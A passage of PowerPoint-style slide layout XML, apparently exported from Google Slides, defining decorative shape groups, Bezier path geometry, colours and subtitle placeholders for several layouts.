                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15202" y="8159"/>
                    <a:pt x="14676" y="8015"/>
                    <a:pt x="14035" y="7667"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13530" y="7403"/>
                    <a:pt x="13035" y="7288"/>
                    <a:pt x="12567" y="7288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11003" y="7288"/>
                    <a:pt x="9742" y="8571"/>
                    <a:pt x="9449" y="9855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8824" y="12425"/>
                    <a:pt x="7573" y="14510"/>
                    <a:pt x="6287" y="14649"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2813" y="15032"/>
                    <a:pt x="0" y="15830"/>
                    <a:pt x="0" y="19062"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26333" y="19062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26333" y="128"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="25981" y="41"/>
                    <a:pt x="25676" y="1"/>
                    <a:pt x="25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7545725" y="4003000"/>
              <a:ext cx="1605658" cy="1140492"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="14115" w="19872">
                  <a:moveTo>
                    <a:pt x="17580" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="15754" y="1"/>
                    <a:pt x="14606" y="2651"/>
                    <a:pt x="16189" y="6230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16973" y="7970"/>
                    <a:pt x="15814" y="9152"/>
                    <a:pt x="14477" y="9152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13625" y="9152"/>
                    <a:pt x="12700" y="8672"/>
                    <a:pt x="12159" y="7550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11482" y="6181"/>
                    <a:pt x="10157" y="5415"/>
                    <a:pt x="8843" y="5415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7388" y="5415"/>
                    <a:pt x="5948" y="6354"/>
                    <a:pt x="5420" y="8454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4619" y="11650"/>
                    <a:pt x="2571" y="14115"/>
                    <a:pt x="0" y="14115"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19871" y="14115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19593" y="983"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18898" y="306"/>
                    <a:pt x="18200" y="1"/>
                    <a:pt x="17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6" name="Google Shape;656;p56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657" name="Google Shape;657;p5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5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5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5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5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5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5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5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3" name="Google Shape;683;p56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="6873527" y="1007415"/>
            <a:ext cx="3277906" cy="1263056"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="684" name="Google Shape;684;p5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5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5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5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5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5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5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5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5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5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5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0" name="Google Shape;710;p56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5866102" y="3880440"/>
            <a:ext cx="3277907" cy="1263054"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="711" name="Google Shape;711;p5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5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5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5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5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7" name="Google Shape;737;p56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="-7923" y="3880440"/>
            <a:ext cx="3277907" cy="1263054"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="738" name="Google Shape;738;p56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6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6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6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6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56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56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6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6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6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56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56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6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6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6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6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6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6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6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6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6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6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6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56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6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6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4" name="Google Shape;764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57"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="39700" y="-10"/>
            <a:ext cx="3277906" cy="1263054"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="767" name="Google Shape;767;p5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5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5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5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5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3" name="Google Shape;793;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689242" y="1333319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94" name="Google Shape;794;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331942" y="1684475"/>
            <a:ext cx="2480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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307983" y="1333319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96" name="Google Shape;796;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5950683" y="1684475"/>
            <a:ext cx="2480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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070525" y="1333319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98" name="Google Shape;798;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="1684550"/>
            <a:ext cx="2480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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689242" y="2931319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00" name="Google Shape;800;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331942" y="3281838"/>
            <a:ext cx="2480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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307983" y="2931319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02" name="Google Shape;802;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5950683" y="3281838"/>
            <a:ext cx="2480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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="14" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070525" y="2931319"/>
            <a:ext cx="1765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Black"/>
              <a:buNone/>
              <a:defRPr sz="16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804" name="Google Shape;804;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="3281838"/>
            <a:ext cx="2480100" cy="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5" name="Google Shape;805;p57"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="5303899" y="8"/>
            <a:ext cx="3840097" cy="2558635"/>
            <a:chOff x="235225" y="2771600"/>
            <a:chExt cx="3133750" cy="2088000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="806" name="Google Shape;806;p5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57"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="-1" y="8"/>
            <a:ext cx="3840097" cy="2558635"/>
            <a:chOff x="235225" y="2771600"/>
            <a:chExt cx="3133750" cy="2088000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="812" name="Google Shape;812;p57"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2616250" y="4833875"/>
              <a:ext cx="390300" cy="25725"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1029" w="15612">
                  <a:moveTo>
                    <a:pt x="7918" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6022" y="0"/>
                    <a:pt x="4126" y="195"/>
                    <a:pt x="2230" y="583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1445" y="699"/>
                    <a:pt x="776" y="922"/>
                    <a:pt x="0" y="1029"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="15612" y="1029"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14943" y="806"/>
                    <a:pt x="14274" y="699"/>
                    <a:pt x="13605" y="583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11709" y="195"/>
                    <a:pt x="9813" y="0"/>
                    <a:pt x="7918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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="235225" y="3025200"/>
              <a:ext cx="1299375" cy="1834400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="73376" w="51975">
                  <a:moveTo>
                    <a:pt x="116" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116" y="73376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51974" y="73376"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="50297" y="72930"/>
                    <a:pt x="48629" y="72376"/>
                    <a:pt x="47067" y="71814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43945" y="70922"/>
                    <a:pt x="40823" y="69584"/>
                    <a:pt x="38592" y="67247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36469" y="64901"/>
                    <a:pt x="34462" y="62340"/>
                    <a:pt x="31679" y="60779"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28110" y="58879"/>
                    <a:pt x="24203" y="58772"/>
                    <a:pt x="20411" y="57987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16843" y="57318"/>
                    <a:pt x="13498" y="56203"/>
                    <a:pt x="10598" y="53972"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4246" y="49066"/>
                    <a:pt x="1231" y="41706"/>
                    <a:pt x="562" y="33900"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="26094"/>
                    <a:pt x="2462" y="18511"/>
                    <a:pt x="2239" y="10705"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2239" y="7137"/>
                    <a:pt x="1677" y="3461"/>
                    <a:pt x="232" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="223"/>
                    <a:pt x="116" y="116"/>
                    <a:pt x="116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238125" y="2771600"/>
              <a:ext cx="3130850" cy="2088000"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="83520" w="125234">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="6915"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1900" y="9591"/>
                    <a:pt x="3122" y="12713"/>
                    <a:pt x="3684" y="15943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4684" y="22527"/>
                    <a:pt x="3345" y="28878"/>
                    <a:pt x="2569" y="35346"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1784" y="42483"/>
                    <a:pt x="2453" y="50066"/>
                    <a:pt x="5799" y="56534"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7583" y="59879"/>
                    <a:pt x="9929" y="62894"/>
                    <a:pt x="13275" y="64785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16174" y="66463"/>
                    <a:pt x="19519" y="67239"/>
                    <a:pt x="22865" y="67801"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26433" y="68247"/>
                    <a:pt x="29886" y="68800"/>
                    <a:pt x="32901" y="70807"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35907" y="72814"/>
                    <a:pt x="38137" y="75830"/>
                    <a:pt x="41260" y="77721"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44828" y="79844"/>
                    <a:pt x="49182" y="80736"/>
                    <a:pt x="53080" y="81851"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55203" y="82405"/>
                    <a:pt x="57434" y="82967"/>
                    <a:pt x="59548" y="83520"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="86311" y="83520"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="89880" y="82851"/>
                    <a:pt x="93341" y="81958"/>
                    <a:pt x="96909" y="81289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98997" y="80874"/>
                    <a:pt x="101118" y="80647"/>
                    <a:pt x="103238" y="80647"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105077" y="80647"/>
                    <a:pt x="106915" y="80818"/>
                    <a:pt x="108730" y="81182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111183" y="81735"/>
                    <a:pt x="113413" y="82520"/>
                    <a:pt x="115751" y="83520"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="125234" y="83520"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="124342" y="82744"/>
                    <a:pt x="123449" y="82074"/>
                    <a:pt x="122557" y="81405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115864" y="76771"/>
                    <a:pt x="107818" y="74901"/>
                    <a:pt x="99819" y="74901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95685" y="74901"/>
                    <a:pt x="91564" y="75400"/>
                    <a:pt x="87649" y="76276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83004" y="77261"/>
                    <a:pt x="78181" y="79000"/>
                    <a:pt x="73516" y="79000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70791" y="79000"/>
                    <a:pt x="68120" y="78406"/>
                    <a:pt x="65570" y="76722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62563" y="74599"/>
                    <a:pt x="60556" y="71253"/>
                    <a:pt x="57880" y="68693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54980" y="65901"/>
                    <a:pt x="51635" y="64232"/>
                    <a:pt x="47844" y="63447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44235" y="62797"/>
                    <a:pt x="40508" y="62755"/>
                    <a:pt x="36769" y="62755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36218" y="62755"/>
                    <a:pt x="35666" y="62756"/>
                    <a:pt x="35115" y="62756"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29809" y="62756"/>
                    <a:pt x="24510" y="62672"/>
                    <a:pt x="19519" y="60887"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9367" y="57203"/>
                    <a:pt x="5915" y="47505"/>
                    <a:pt x="7253" y="36131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8698" y="24311"/>
                    <a:pt x="11374" y="14498"/>
                    <a:pt x="3791" y="4568"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2676" y="3123"/>
                    <a:pt x="1338" y="1562"/>
                    <a:pt x="0" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="51BF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2395900" y="4787775"/>
              <a:ext cx="736000" cy="71825"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2873" w="29440">
                  <a:moveTo>
                    <a:pt x="16927" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14807" y="0"/>
                    <a:pt x="12686" y="227"/>
                    <a:pt x="10598" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7030" y="1311"/>
                    <a:pt x="3569" y="2204"/>
                    <a:pt x="0" y="2873"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8814" y="2873"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9590" y="2766"/>
                    <a:pt x="10259" y="2543"/>
                    <a:pt x="11044" y="2427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12940" y="2039"/>
                    <a:pt x="14836" y="1844"/>
                    <a:pt x="16732" y="1844"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18627" y="1844"/>
                    <a:pt x="20523" y="2039"/>
                    <a:pt x="22419" y="2427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23088" y="2543"/>
                    <a:pt x="23757" y="2650"/>
                    <a:pt x="24426" y="2873"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29440" y="2873"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="27102" y="1873"/>
                    <a:pt x="24872" y="1088"/>
                    <a:pt x="22419" y="535"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20604" y="171"/>
                    <a:pt x="18766" y="0"/>
                    <a:pt x="16927" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="35B1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235225" y="2944450"/>
              <a:ext cx="1491600" cy="1915150"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="76606" w="59664">
                  <a:moveTo>
                    <a:pt x="116" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116" y="3230"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="3346"/>
                    <a:pt x="232" y="3453"/>
                    <a:pt x="232" y="3453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1677" y="6691"/>
                    <a:pt x="2239" y="10367"/>
                    <a:pt x="2239" y="13935"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2462" y="21741"/>
                    <a:pt x="0" y="29324"/>
                    <a:pt x="562" y="37130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1231" y="44936"/>
                    <a:pt x="4246" y="52296"/>
                    <a:pt x="10598" y="57202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13498" y="59433"/>
                    <a:pt x="16843" y="60548"/>
                    <a:pt x="20411" y="61217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24203" y="62002"/>
                    <a:pt x="28110" y="62109"/>
                    <a:pt x="31679" y="64009"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34462" y="65570"/>
                    <a:pt x="36469" y="68131"/>
                    <a:pt x="38592" y="70477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40823" y="72814"/>
                    <a:pt x="43945" y="74152"/>
                    <a:pt x="47067" y="75044"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48629" y="75606"/>
                    <a:pt x="50297" y="76160"/>
                    <a:pt x="51974" y="76606"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="59664" y="76606"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57550" y="76053"/>
                    <a:pt x="55319" y="75491"/>
                    <a:pt x="53196" y="74937"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49298" y="73822"/>
                    <a:pt x="44944" y="72930"/>
                    <a:pt x="41376" y="70807"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38253" y="68916"/>
                    <a:pt x="36023" y="65900"/>
                    <a:pt x="33017" y="63893"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30002" y="61886"/>
                    <a:pt x="26549" y="61333"/>
                    <a:pt x="22981" y="60887"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19635" y="60325"/>
                    <a:pt x="16290" y="59549"/>
                    <a:pt x="13391" y="57871"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10045" y="55980"/>
                    <a:pt x="7699" y="52965"/>
                    <a:pt x="5915" y="49620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2569" y="43152"/>
                    <a:pt x="1900" y="35569"/>
                    <a:pt x="2685" y="28432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3461" y="21964"/>
                    <a:pt x="4800" y="15613"/>
                    <a:pt x="3800" y="9029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3238" y="5799"/>
                    <a:pt x="2016" y="2677"/>
                    <a:pt x="11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7" name="Google Shape;817;p57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18" name="Google Shape;818;p57"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5858252" y="-10"/>
            <a:ext cx="3277907" cy="1263054"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="819" name="Google Shape;819;p57"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="3734649" y="-3464435"/>
              <a:ext cx="35256" cy="35341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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="3972439" y="-3543867"/>
              <a:ext cx="61889" cy="61889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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="3457037" y="-3941748"/>
              <a:ext cx="47008" cy="43965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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="3078095" y="-4068062"/>
              <a:ext cx="20545" cy="17670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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="2818238" y="-3852170"/>
              <a:ext cx="26379" cy="26463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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="3229308" y="-3026817"/>
              <a:ext cx="26632" cy="26379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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="2706594" y="-4125385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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="4012007" y="-4076855"/>
              <a:ext cx="38385" cy="35341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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="4369051" y="-3485107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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="4346942" y="-3762549"/>
              <a:ext cx="26632" cy="29423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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="4531974" y="-4032974"/>
              <a:ext cx="53011" cy="5605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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="4668645" y="-3229477"/>
              <a:ext cx="43965" cy="44049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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="4698194" y="-3352874"/>
              <a:ext cx="104163" cy="89789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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="4042064" y="-3732197"/>
              <a:ext cx="76431" cy="71612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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="2973130" y="-3046686"/>
              <a:ext cx="79475" cy="72119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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="3989475" y="-3650270"/>
              <a:ext cx="44049" cy="39737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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="1766721" y="-3423260"/>
              <a:ext cx="35341" cy="35256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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="1810644" y="-2976892"/>
              <a:ext cx="35341" cy="35341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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="1904195" y="-3502735"/>
              <a:ext cx="41175" cy="41259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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="2001763" y="-3363062"/>
              <a:ext cx="43965" cy="41006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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="4253897" y="-3773667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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="5027000" y="-2888709"/>
              <a:ext cx="17670" cy="17670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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="3036836" y="-2904604"/>
              <a:ext cx="44049" cy="40498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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="3579842" y="-4009259"/>
              <a:ext cx="44049" cy="4109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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="2893951" y="-2988559"/>
              <a:ext cx="41259" cy="4109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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="3149453" y="-3985121"/>
              <a:ext cx="44049" cy="39822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5" name="Google Shape;845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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617350" y="397325"/>
            <a:ext cx="38133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850" name="Google Shape;850;p59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
